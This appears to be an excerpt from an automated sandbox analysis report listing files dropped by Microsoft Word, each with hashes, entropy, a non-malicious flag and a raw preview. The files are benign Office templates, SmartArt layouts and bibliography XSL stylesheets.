                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):282
                              Entropy (8bit):3.5459495297497368
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                              MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                              SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                              SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                              SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):4026
                              Entropy (8bit):7.809492693601857
                              Encrypted:false
                              SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                              MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                              SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                              SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                              SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                              Malicious:false
                              Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):250
                              Entropy (8bit):3.4916022431157345
                              Encrypted:false
                              SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                              MD5:1A314B08BB9194A41E3794EF54017811
                              SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                              SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                              SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):16806
                              Entropy (8bit):7.9519793977093505
                              Encrypted:false
                              SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                              MD5:950F3AB11CB67CC651082FEBE523AF63
                              SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                              SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                              SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):254
                              Entropy (8bit):3.4720677950594836
                              Encrypted:false
                              SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                              MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                              SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                              SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                              SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):280
                              Entropy (8bit):3.484503080761839
                              Encrypted:false
                              SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                              MD5:1309D172F10DD53911779C89A06BBF65
                              SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                              SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                              SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):9191
                              Entropy (8bit):7.93263830735235
                              Encrypted:false
                              SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                              MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                              SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                              SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                              SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                              Malicious:false
                              Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):333258
                              Entropy (8bit):4.654450340871081
                              Encrypted:false
                              SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                              MD5:5632C4A81D2193986ACD29EADF1A2177
                              SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                              SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                              SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):328
                              Entropy (8bit):3.541819892045459
                              Encrypted:false
                              SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                              MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                              SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                              SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                              SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):3.5081874837369886
                              Encrypted:false
                              SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                              MD5:8D9B02CC69FA40564E6C781A9CC9E626
                              SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                              SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                              SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):255948
                              Entropy (8bit):5.103631650117028
                              Encrypted:false
                              SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                              MD5:9888A214D362470A6189DEFF775BE139
                              SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                              SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                              SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):256
                              Entropy (8bit):3.464918006641019
                              Encrypted:false
                              SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                              MD5:93149E194021B37162FD86684ED22401
                              SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                              SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                              SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):51826
                              Entropy (8bit):5.541375256745271
                              Encrypted:false
                              SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                              MD5:2AB22AC99ACFA8A82742E774323C0DBD
                              SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                              SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                              SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                              Malicious:false
                              Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):258
                              Entropy (8bit):3.4692172273306268
                              Encrypted:false
                              SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                              MD5:C1B36A0547FB75445957A619201143AC
                              SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                              SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                              SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):7370
                              Entropy (8bit):7.9204386289679745
                              Encrypted:false
                              SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                              MD5:586CEBC1FAC6962F9E36388E5549FFE9
                              SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                              SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                              SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                              Malicious:false
                              Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):3.538396048757031
                              Encrypted:false
                              SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                              MD5:149948E41627BE5DC454558E12AF2DA4
                              SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                              SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                              SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):250983
                              Entropy (8bit):5.057714239438731
                              Encrypted:false
                              SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                              MD5:F883B260A8D67082EA895C14BF56DD56
                              SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                              SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                              SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):256
                              Entropy (8bit):3.4842773155694724
                              Encrypted:false
                              SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                              MD5:923D406B2170497AD4832F0AD3403168
                              SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                              SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                              SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):11380
                              Entropy (8bit):7.891971054886943
                              Encrypted:false
                              SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                              MD5:C9F9364C659E2F0C626AC0D0BB519062
                              SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                              SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                              SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 